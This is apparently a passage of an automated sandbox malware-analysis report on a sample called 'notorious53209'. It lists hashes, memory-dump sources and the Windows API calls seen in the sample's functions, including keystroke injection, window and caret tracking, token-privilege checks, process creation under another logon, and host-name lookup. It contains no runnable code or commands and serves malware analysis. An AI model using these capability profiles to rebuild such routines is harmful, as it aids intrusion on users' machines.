                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: KeyboardState$InputMessagePostSend
                                            • String ID:
                                            • API String ID: 432972143-0
                                            • Opcode ID: 017c3adf437a407dc527ddd943c16a664bceab81197d4be29953f2f7ee80a0c4
                                            • Instruction ID: db6e5e2f53e075f1edd5dcef519419acef267f5b73dddb56a06e7547e2fe74e4
                                            • Opcode Fuzzy Hash: 017c3adf437a407dc527ddd943c16a664bceab81197d4be29953f2f7ee80a0c4
                                            • Instruction Fuzzy Hash: 87315C30E6068BAEFF348F678C097F9BBA9AF44310F04432AE995521D1C37689F49751
                                            APIs
                                            • GetKeyboardState.USER32(?), ref: 00291176
                                            • SetKeyboardState.USER32(00000080), ref: 00291192
                                            • PostMessageW.USER32(00000000,00000101,00000000), ref: 002911F1
                                            • SendInput.USER32(00000001,?,0000001C), ref: 00291243
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: KeyboardState$InputMessagePostSend
                                            • String ID:
                                            • API String ID: 432972143-0
                                            • Opcode ID: d3cd5f9f98a71f161aac82eb56e947ffe793411ec94d343a06628f3564fe2d4b
                                            • Instruction ID: 0d8ca087523f627e0e0f95c5202ec75e56ee37fc19a0bc4a9be584fae8ef14f6
                                            • Opcode Fuzzy Hash: d3cd5f9f98a71f161aac82eb56e947ffe793411ec94d343a06628f3564fe2d4b
                                            • Instruction Fuzzy Hash: 6E314830D6021EAEFF319F6B8C097FABBAAAB49310F04432AE588921D1C37449749751
                                            APIs
                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0026644B
                                            • __isleadbyte_l.LIBCMT ref: 00266479
                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 002664A7
                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 002664DD
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                            • String ID:
                                            • API String ID: 3058430110-0
                                            • Opcode ID: 4f055312518e8af11ff522e10bf8481587f45b89cfa03b2a0a5ce5f38e86e302
                                            • Instruction ID: 22e07a6701b9a4d1d22558ee56d6a77a7b206c8f685b9a689c9e0581ac45fdbf
                                            • Opcode Fuzzy Hash: 4f055312518e8af11ff522e10bf8481587f45b89cfa03b2a0a5ce5f38e86e302
                                            • Instruction Fuzzy Hash: 9131CD31620257EFDB318F75CC49BAA7BB9FF40360F154529E864971A1EB31E8A0DB90
                                            APIs
                                            • GetForegroundWindow.USER32 ref: 002B5189
                                              • Part of subcall function 0029387D: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00293897
                                              • Part of subcall function 0029387D: GetCurrentThreadId.KERNEL32(00000000,?,002952A7), ref: 0029389E
                                              • Part of subcall function 0029387D: AttachThreadInput.USER32(00000000,?,002952A7), ref: 002938A5
                                            • GetCaretPos.USER32(?), ref: 002B519A
                                            • ClientToScreen.USER32(00000000,?), ref: 002B51D5
                                            • GetForegroundWindow.USER32 ref: 002B51DB
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                            • String ID:
                                            • API String ID: 2759813231-0
                                            • Opcode ID: 002365ffd911e468301449fd91e2ce036ef4ad0c39950aef3bd617fc2047317d
                                            • Instruction ID: ca96ab3072b1e8338da50221a102a7ea03089bbd5efc502f1300f9f83f632eeb
                                            • Opcode Fuzzy Hash: 002365ffd911e468301449fd91e2ce036ef4ad0c39950aef3bd617fc2047317d
                                            • Instruction Fuzzy Hash: BF314FB1910108AFCB04EFA5CD45AEFB7F9EF89300F10406AE405E7241EA759E51CFA0
                                            APIs
                                              • Part of subcall function 00288652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00288669
                                              • Part of subcall function 00288652: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00288673
                                              • Part of subcall function 00288652: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00288682
                                              • Part of subcall function 00288652: RtlAllocateHeap.NTDLL(00000000,?,TokenIntegrityLevel), ref: 00288689
                                              • Part of subcall function 00288652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0028869F
                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00288BEB
                                            • _memcmp.LIBCMT ref: 00288C0E
                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00288C44
                                            • HeapFree.KERNEL32(00000000), ref: 00288C4B
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: Heap$InformationProcessToken$AllocateErrorFreeLastLookupPrivilegeValue_memcmp
                                            • String ID:
                                            • API String ID: 2182266621-0
                                            • Opcode ID: ba05c682580c430fa3f1d5fc7c98ac5aa81eceeccc60f2c7f03694cc182712c7
                                            • Instruction ID: bceb22e70309eaf6b60c97f3a46765e86d53e15edb0c522c2469dcd3d9a21375
                                            • Opcode Fuzzy Hash: ba05c682580c430fa3f1d5fc7c98ac5aa81eceeccc60f2c7f03694cc182712c7
                                            • Instruction Fuzzy Hash: E821A171D12209EFCB04EF94C948BEEB7F8EF44344F48405AE454A7281DB30AE15CB60
                                            APIs
                                            • __setmode.LIBCMT ref: 00250BF2
                                              • Part of subcall function 00235B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00297B20,?,?,00000000), ref: 00235B8C
                                              • Part of subcall function 00235B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00297B20,?,?,00000000,?,?), ref: 00235BB0
                                            • _fprintf.LIBCMT ref: 00250C29
                                            • OutputDebugStringW.KERNEL32(?), ref: 00286331
                                              • Part of subcall function 00254CDA: _flsall.LIBCMT ref: 00254CF3
                                            • __setmode.LIBCMT ref: 00250C5E
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                            • String ID:
                                            • API String ID: 521402451-0
                                            • Opcode ID: dee6e3b79d832d30b687f5570d9aa6ad0dea02d32e428d99614b7a3171cbdd6f
                                            • Instruction ID: fb69c97d8af3096bb4d9a6f49e619e89b7e5db8ff3e1beab4dc8f4d4953021a7
                                            • Opcode Fuzzy Hash: dee6e3b79d832d30b687f5570d9aa6ad0dea02d32e428d99614b7a3171cbdd6f
                                            • Instruction Fuzzy Hash: 60116A729242047FCB0477B4AC879BEBB689F42322F14011AF904572C2DE700DF99B99
                                            APIs
                                              • Part of subcall function 0028F5AD: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,0028E1C4,?,?,?,0028EFB7,00000000,000000EF,00000119,?,?), ref: 0028F5BC
                                              • Part of subcall function 0028F5AD: lstrcpyW.KERNEL32(00000000,?), ref: 0028F5E2
                                              • Part of subcall function 0028F5AD: lstrcmpiW.KERNEL32(00000000,?,0028E1C4,?,?,?,0028EFB7,00000000,000000EF,00000119,?,?), ref: 0028F613
                                            • lstrlenW.KERNEL32(?,00000002,?,?,?,?,0028EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 0028E1DD
                                            • lstrcpyW.KERNEL32(00000000,?), ref: 0028E203
                                            • lstrcmpiW.KERNEL32(00000002,cdecl,?,0028EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 0028E237
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: lstrcmpilstrcpylstrlen
                                            • String ID: cdecl
                                            • API String ID: 4031866154-3896280584
                                            • Opcode ID: ccfc9cdf0ab7eab8e6ceca2fdf9af51e6376d80dcc6f74691893a3898f6e2726
                                            • Instruction ID: d9d1f61ced84609b96a93a6feb4486e23a662ae40332c1f5fc1d73e302842a0c
                                            • Opcode Fuzzy Hash: ccfc9cdf0ab7eab8e6ceca2fdf9af51e6376d80dcc6f74691893a3898f6e2726
                                            • Instruction Fuzzy Hash: F911813A121345EFCF25AF68DC4997A77A8FF85350B41812AEC06CB2A4EB7198619790
                                            APIs
                                            • _free.LIBCMT ref: 00265351
                                              • Part of subcall function 0025594C: __FF_MSGBANNER.LIBCMT ref: 00255963
                                              • Part of subcall function 0025594C: __NMSG_WRITE.LIBCMT ref: 0025596A
                                              • Part of subcall function 0025594C: RtlAllocateHeap.NTDLL(00B70000,00000000,00000001), ref: 0025598F
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: AllocateHeap_free
                                            • String ID:
                                            • API String ID: 614378929-0
                                            • Opcode ID: 1b9acf41d3bb3309efacfc9fd22e0d25ed47cad54a8459923ccaf64a6d4be986
                                            • Instruction ID: e073af448d8bb3a8da882f3cf0b465014aa56542ca3a297155336603951014c6
                                            • Opcode Fuzzy Hash: 1b9acf41d3bb3309efacfc9fd22e0d25ed47cad54a8459923ccaf64a6d4be986
                                            • Instruction Fuzzy Hash: F9112732525A26AFCB202F74EC4561E37E45F00BE1F1005A9FC04AA291DEF089F0CB94
                                            APIs
                                            • _memset.LIBCMT ref: 00234560
                                              • Part of subcall function 0023410D: _memset.LIBCMT ref: 0023418D
                                              • Part of subcall function 0023410D: _wcscpy.LIBCMT ref: 002341E1
                                              • Part of subcall function 0023410D: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 002341F1
                                            • KillTimer.USER32(?,00000001), ref: 002345B5
                                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 002345C4
                                            • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0026D6CE
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                            • String ID:
                                            • API String ID: 1378193009-0
                                            • Opcode ID: a7072c30076c2fd2d80d722109cc1d2b87374cf3e6ddcc63a866b4abbd87d306
                                            • Instruction ID: a4ead2ae85be1dc401b2c9d5b7da95423fd7a5b480af784b92bb54688a60a164
                                            • Opcode Fuzzy Hash: a7072c30076c2fd2d80d722109cc1d2b87374cf3e6ddcc63a866b4abbd87d306
                                            • Instruction Fuzzy Hash: 8621B6B09147889BE7329B24EC59BE7BBEC9B11304F04009EE69E56181C7B46A949B51
                                            APIs
                                            • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 002940D1
                                            • _memset.LIBCMT ref: 002940F2
                                            • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00294144
                                            • CloseHandle.KERNEL32(00000000), ref: 0029414D
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: CloseControlCreateDeviceFileHandle_memset
                                            • String ID:
                                            • API String ID: 1157408455-0
                                            • Opcode ID: 0c37415db4f7da6ce58db1c1180dccc25f7be3118d8c67f60469f0ac9e7c0a2a
                                            • Instruction ID: cc4e29054aabf262fad187df61710d70c791ea0647a9071782d54f9d4f3420be
                                            • Opcode Fuzzy Hash: 0c37415db4f7da6ce58db1c1180dccc25f7be3118d8c67f60469f0ac9e7c0a2a
                                            • Instruction Fuzzy Hash: 3A11CD75D113287AD7309BA5AC4DFABBB7CEF44760F104696F908D7180D6744E84CBA4
                                            APIs
                                            • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00288B2A
                                            • OpenProcessToken.ADVAPI32(00000000), ref: 00288B31
                                            • CloseHandle.KERNEL32(00000004), ref: 00288B4B
                                            • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00288B7A
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: Process$CloseCreateCurrentHandleLogonOpenTokenWith
                                            • String ID:
                                            • API String ID: 2621361867-0
                                            • Opcode ID: 1fbc7bb91887ddc4b5fbd94c746cc4fe00c2b888237737495d2a47471d787062
                                            • Instruction ID: c1abceb9b5ec0319e51628a64b2882300e3a1b4bbb7fc74e8d749f87bb6c2889
                                            • Opcode Fuzzy Hash: 1fbc7bb91887ddc4b5fbd94c746cc4fe00c2b888237737495d2a47471d787062
                                            • Instruction Fuzzy Hash: A11160B650120EABDF019F94ED49FDE7BA9EF48308F044164FE04E21A0C7718D60EB60
                                            APIs
                                              • Part of subcall function 00235B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00297B20,?,?,00000000), ref: 00235B8C
                                              • Part of subcall function 00235B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00297B20,?,?,00000000,?,?), ref: 00235BB0
                                            • gethostbyname.WS2_32(?), ref: 002A66AC
                                            • WSAGetLastError.WS2_32(00000000), ref: 002A66B7
                                            • _memmove.LIBCMT ref: 002A66E4
                                            • inet_ntoa.WS2_32(?), ref: 002A66EF
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                            • String ID:
                                            • API String ID: 1504782959-0
                                            • Opcode ID: a19fb83b171a8fcd24c6406194ff695a04f81039be248e7f04b24b5bcc3d9bdd
                                            • Instruction ID: 03ded3a7e41060ee34cc3cd50a1e19a382e74d67cc020881ae2847fc26b354c1
                                            • Opcode Fuzzy Hash: a19fb83b171a8fcd24c6406194ff695a04f81039be248e7f04b24b5bcc3d9bdd
                                            • Instruction Fuzzy Hash: 7C118E75520508AFCB00FBA4DD8ADEEB7B8AF09310B044165F506A72A1DF30AF64CF61
                                            APIs
                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 00289043
                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00289055
                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0028906B
                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00289086
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: MessageSend
                                            • String ID:
                                            • API String ID: 3850602802-0
                                            • Opcode ID: 0d2cb489deda4a0c0991f894e440ebec8b59321e69019ee80fa369582cb35470
                                            • Instruction ID: bf387611be4674794afc4104dd0439b905d73b09b1cec8ac7a650542b5830c7c
                                            • Opcode Fuzzy Hash: 0d2cb489deda4a0c0991f894e440ebec8b59321e69019ee80fa369582cb35470
                                            • Instruction Fuzzy Hash: 11115E79901218FFDB10DFA5CD84EADBBB8FB48310F204095E904B7290D6726E60DB90
                                            APIs
                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,002901FD,?,00291250,?,00008000), ref: 0029166F
                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,002901FD,?,00291250,?,00008000), ref: 00291694
                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,002901FD,?,00291250,?,00008000), ref: 0029169E
                                            • Sleep.KERNEL32(?,?,?,?,?,?,?,002901FD,?,00291250,?,00008000), ref: 002916D1
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: CounterPerformanceQuerySleep
                                            • String ID:
                                            • API String ID: 2875609808-0
                                            • Opcode ID: 9e848c84688c0f3f97aa328dd4b3fd484d4856e9af70b6d68c3dbd17d3c976bb
                                            • Instruction ID: 558647c8638898a387c828a0c1de643d5671a4fa0740b067ee953035a77909a9
                                            • Opcode Fuzzy Hash: 9e848c84688c0f3f97aa328dd4b3fd484d4856e9af70b6d68c3dbd17d3c976bb
